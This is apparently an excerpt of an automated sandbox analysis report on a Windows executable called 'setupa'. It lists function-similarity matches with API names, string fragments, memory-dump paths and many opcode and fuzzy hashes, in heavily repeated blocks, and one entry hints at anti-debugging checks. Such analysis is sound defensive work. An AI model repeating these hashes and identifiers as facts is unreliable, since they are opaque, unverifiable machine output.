                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExitThread$AllocCloseFreeHandleHeapLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 2953685951-0
                                                                                                              • Opcode ID: 1654a14da99ad6242d2779c7e4f180efcdf412fc0eeb0cc2b29fae509ee055d0
                                                                                                              • Instruction ID: 5a1be6b70d4f782b9565fcb00a28b05514d11138bbe421702c300508e4ea245e
                                                                                                              • Opcode Fuzzy Hash: 1654a14da99ad6242d2779c7e4f180efcdf412fc0eeb0cc2b29fae509ee055d0
                                                                                                              • Instruction Fuzzy Hash: CDF01D21F1D207C6FA246FB158612B512817F56FE3F185B38D92ECA6C1DE2CA480D611
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2962429428-0
                                                                                                              • Opcode ID: 5d4c14f095bd13ed5ed1d584fb225d85a201909bf4a6d7e30073ab8ad903ccdc
                                                                                                              • Instruction ID: 61ffcee9935724154fe6af046e9977c1074fb131d6a0423fd4660b4c344b446f
                                                                                                              • Opcode Fuzzy Hash: 5d4c14f095bd13ed5ed1d584fb225d85a201909bf4a6d7e30073ab8ad903ccdc
                                                                                                              • Instruction Fuzzy Hash: 41D0A771E0598AC2FA102E7D959403C6310AF58F72B385534C52F863E3DD1CC4D2D744
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: AddressProc$EncodeHandleModulePointer
• String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
• API String ID: 73157160-295688737
• Opcode ID: fd85ed9c118ea9e1572a2e8e6efdb1bd63540041d78c075f14bb4afec17b13ea
• Instruction ID: 6de3cc8105f8c104e6547a5ce000280211efe663f161d4f18b4d7605b9a67f23
• Opcode Fuzzy Hash: fd85ed9c118ea9e1572a2e8e6efdb1bd63540041d78c075f14bb4afec17b13ea
• Instruction Fuzzy Hash: C9E14778A29B47D1FA449F61F89406923A1FF59FD2F85643DC80E97220EE7CE1A9C350
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: DebuggerLibraryPresent$AddressCurrentFreeLoadProcProcess
• String ID: .$3$e$gerP$k$l$nt$r$rese
• API String ID: 3962861327-1167263003
• Opcode ID: d2dfd9bb01c9b96864fd71735602551593babdd7bf391298f7bddd65d8d3ec6c
• Instruction ID: 405d00699044bec9e76e2b1f6c892af44096f7bcc50caf5513ffb88fa18b52fe
• Opcode Fuzzy Hash: d2dfd9bb01c9b96864fd71735602551593babdd7bf391298f7bddd65d8d3ec6c
• Instruction Fuzzy Hash: 90215776E09752CAF701CF62A4441AD27B5BF54F89B14803CCE4AA7B08DF78D585CB50
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: memcpy_s
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 1502251526-2761157908
• Opcode ID: 6965fd0a0cac8fe04cfafca7a233755c2481c3427dbbe554813bda7e232fbefa
• Instruction ID: 641a811015c02a0d08266b087643133cc7bd62ba8e5f0b89b9776617ef857a6f
• Opcode Fuzzy Hash: 6965fd0a0cac8fe04cfafca7a233755c2481c3427dbbe554813bda7e232fbefa
• Instruction Fuzzy Hash: A4B2C272A08282CFE7658E7994406FD27A5FF84BCDF905139DA0A97B84DF38E944DB40
APIs
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: Locale$CodeInfoPageValid$DefaultEnumLocalesProcessSystemUser
• String ID:
• API String ID: 2191266518-0
• Opcode ID: 62c1ae0b41638935006e9e636ee6bdedff1646985e30343f695f0234d7bdcc7e
• Instruction ID: e867b75cdfd3b53b10e48a71f9c0cfb18088ae44c13a85fd356384ea7dbe7ecf
• Opcode Fuzzy Hash: 62c1ae0b41638935006e9e636ee6bdedff1646985e30343f695f0234d7bdcc7e
• Instruction Fuzzy Hash: 5B715922F18602CAFB659F71D8516BD23A0BF48F86F844439CA0D93A95EF3CE945E750
APIs
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
• Opcode ID: fc4a08998613a55882e473a0ce31395ae2e165673b4f18d968b3d4f71c73215e
• Instruction ID: e5f249764ddd629a4ef84c2cce122d60aef488a1e3135351db98707d925d1b9a
• Opcode Fuzzy Hash: fc4a08998613a55882e473a0ce31395ae2e165673b4f18d968b3d4f71c73215e
• Instruction Fuzzy Hash: 5EF19572A08252C6E764CF64E4156F9B7A4FF89F89F905139EB0987B84DF39E900DB40
APIs
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
• Opcode ID: e5123d556de0ccaa47ff0b214ba53b848dae960595974794954e9e9589f5bcfe
• Instruction ID: 965f9b9442b33bdf20abedf5a556efcf74241702458fd814f8e733667eee7c54
• Opcode Fuzzy Hash: e5123d556de0ccaa47ff0b214ba53b848dae960595974794954e9e9589f5bcfe
• Instruction Fuzzy Hash: D6A19472608282C6EB748F25A1416B9B7A1FF58FC5F905139DB8E87B45CE3CE904DB40
APIs
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: ccff9d385fd947602728c7a33772e0aa51e8e8df803f0f43ba0b82f7e2ded9d9
• Instruction ID: 7df1975bee835c318869e046ed9dff26f290725a6fb3c57a2b03099c0081b1a7
• Opcode Fuzzy Hash: ccff9d385fd947602728c7a33772e0aa51e8e8df803f0f43ba0b82f7e2ded9d9
• Instruction Fuzzy Hash: 7E415336A18B81C5EB60CF65E8502AE73A0FF84B95F500139EA9D87B55DF3CD595CB00
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: ErrorFormatFreeLastLocalMessage
• String ID: FormatMessageA failed:
• API String ID: 1365068426-3941490816
• Opcode ID: caa1e78a362334a67372e0ec718cdaeb409f4e6dd051dd7dd82c4ccbca9a7b66
• Instruction ID: b3b0ebe3a4b27425ef75a223f4279a7e283321640b028769bb6c2218d1e426a0
• Opcode Fuzzy Hash: caa1e78a362334a67372e0ec718cdaeb409f4e6dd051dd7dd82c4ccbca9a7b66
• Instruction Fuzzy Hash: 62215E32608A82C6EA209F15F8907EAA361FF85F95F504239DA4D83B99DF3CD545CB04
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID:
• String ID: 0$0$0$0123456789abcdefABCDEF
• API String ID: 0-4215698122
• Opcode ID: 5544af9403bf587e77242deb49054958b10a808bcde7bc6a4a821a76ce6cef9a
• Instruction ID: d9da0104bcde00ebe346d3f7268e9b863a1cd8670ad770a4b1548ca32a63af04
• Opcode Fuzzy Hash: 5544af9403bf587e77242deb49054958b10a808bcde7bc6a4a821a76ce6cef9a
• Instruction Fuzzy Hash: B8910622E0C29686F7268F14951037E7B90FF44F4AF485039DE9E87686DE3DE992D740
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID:
• String ID: $0123456789-
• API String ID: 0-700845222
• Opcode ID: f0b8a4b0e297fea37151a888e5c2176794506fad7d2201413f79211c11c9d547
• Instruction ID: aeb1ae219e08ef6c57cf1dba33125a49b4b2d132aff4afd083ab13672af684f3
• Opcode Fuzzy Hash: f0b8a4b0e297fea37151a888e5c2176794506fad7d2201413f79211c11c9d547
• Instruction Fuzzy Hash: 5982C112B58692C5FB689F6194601BD27A1FF46F85F85443AEE4EA7A85CF3CE4C0E700
APIs
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a8b3939bd2e0131e1b57a818494b36dc5fd9899e703216a391c1a5cd6750c71f
• Instruction ID: e3b5bc90c7edab491b5dab795b776af555b3b3b3c123bbe6247a7d51e98090be
• Opcode Fuzzy Hash: a8b3939bd2e0131e1b57a818494b36dc5fd9899e703216a391c1a5cd6750c71f
• Instruction Fuzzy Hash: 01C15221A18682C2FB749FB69531BBA6291FF85FC5F54403AEE4E83A85DF3CD541DA00
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID:
• String ID: 0123456789ABCDEFabcdef-+XxPp
• API String ID: 0-3606100449
• Opcode ID: cb5706aa228daea54bcbdb8f13c69cbf849a43265d83209aff444b9e8fd6f06f
• Instruction ID: fbf94929df1c66b3354e63d850ce23ec25181e2e80c332d4d3f0995a9991ddc5
• Opcode Fuzzy Hash: cb5706aa228daea54bcbdb8f13c69cbf849a43265d83209aff444b9e8fd6f06f
• Instruction Fuzzy Hash: 4E52B511F0C682E5FB74DF62906017D27A0FF51F85F558A39DA8E82A85EE2CE4C2E701
Strings
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID:
• String ID: 0123456789-+Ee
• API String ID: 0-1347306980
• Opcode ID: 23511fe1a65e298a515fb938c9677606ae9a48fbf5f73832e5be6d8772d04bdd
• Instruction ID: 7cab7ae5527d50b1aa53e0198559fc67e3ef18cc8204433369d4dd00f54d8784
• Opcode Fuzzy Hash: 23511fe1a65e298a515fb938c9677606ae9a48fbf5f73832e5be6d8772d04bdd
• Instruction Fuzzy Hash: CE52A512A0C692E6FB70DF6594602BD6BB0BF51F86F445239DA4E82B85DE3CE4D1E700
APIs
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-0
• Opcode ID: d941c51955f3ac6ef43d583640d27ac7d18357d72a66ffac39c08030b6b559b5
• Instruction ID: 6dbfd4627a5595340c5e5865efaa82e08f2210c46d37cf570a3a078c54b7f6e4
• Opcode Fuzzy Hash: d941c51955f3ac6ef43d583640d27ac7d18357d72a66ffac39c08030b6b559b5
• Instruction Fuzzy Hash: 39029E62A08BC1C6E761CF2894552F973A4FB99B88F459239DF8D83652EF38E5C1C700
APIs
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
• Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumLocalesSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099609381-0
                                                                                                              • Opcode ID: 45f11759097a8c12ddf40c1a2130a0cdebd219534fdbe1bfca9c82a44c0d2ba5
                                                                                                              • Instruction ID: 2c219e0738e2f7390e9ca0503dff6040cd9e05a887c09d0eb6d71ff6a8297819
                                                                                                              • Opcode Fuzzy Hash: 45f11759097a8c12ddf40c1a2130a0cdebd219534fdbe1bfca9c82a44c0d2ba5
                                                                                                              • Instruction Fuzzy Hash: 6311D263A18645CAEB148F25D4406A877A1FF90FE2F84813AC669833C0EE38D5D1D740
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumLocalesSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099609381-0
                                                                                                              • Opcode ID: ede480e1ee975d1e52820b364c914ade96d73c13f1b5827d3ac1942b556d57ab
                                                                                                              • Instruction ID: 6a2ce7e663b347f56fe93cadf49945a3d54151c2f6509f708738a23badad06ec
                                                                                                              • Opcode Fuzzy Hash: ede480e1ee975d1e52820b364c914ade96d73c13f1b5827d3ac1942b556d57ab
                                                                                                              • Instruction Fuzzy Hash: BC018072B08242C6E7504F36E4407A977D5FF40FA6F859239D668872C4EF68D490E700
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 0-4108050209
                                                                                                              • Opcode ID: 190e3d512df1446c8023d55ed37741515a139dc364b2ec3f40d8cc7a0650ff8c
                                                                                                              • Instruction ID: 462210c6d01205317fa5ad5f86f6620780b0b0e4c8fc3da2b3f039304ed9abe9
                                                                                                              • Opcode Fuzzy Hash: 190e3d512df1446c8023d55ed37741515a139dc364b2ec3f40d8cc7a0650ff8c
                                                                                                              • Instruction Fuzzy Hash: 5281C121A18242C6FBB89E2580506BE2390FF41FA6F14153ADD0FD7695CF2EF886D751
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 0-4108050209
                                                                                                              • Opcode ID: c343a4f4fbd0b90894a0db973e5c2f78bbf69234ffd0ee42e5b9127cb83201a8
                                                                                                              • Instruction ID: ccd025c494300adc067eda3e40804ead84edf2f8bc50e0863b09d20fbe01e889
                                                                                                              • Opcode Fuzzy Hash: c343a4f4fbd0b90894a0db973e5c2f78bbf69234ffd0ee42e5b9127cb83201a8
                                                                                                              • Instruction Fuzzy Hash: 1081D026B1C242C6FBA88E65904067D2290BF42FA6F14153EDD0FD7695CF3EE886D700
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
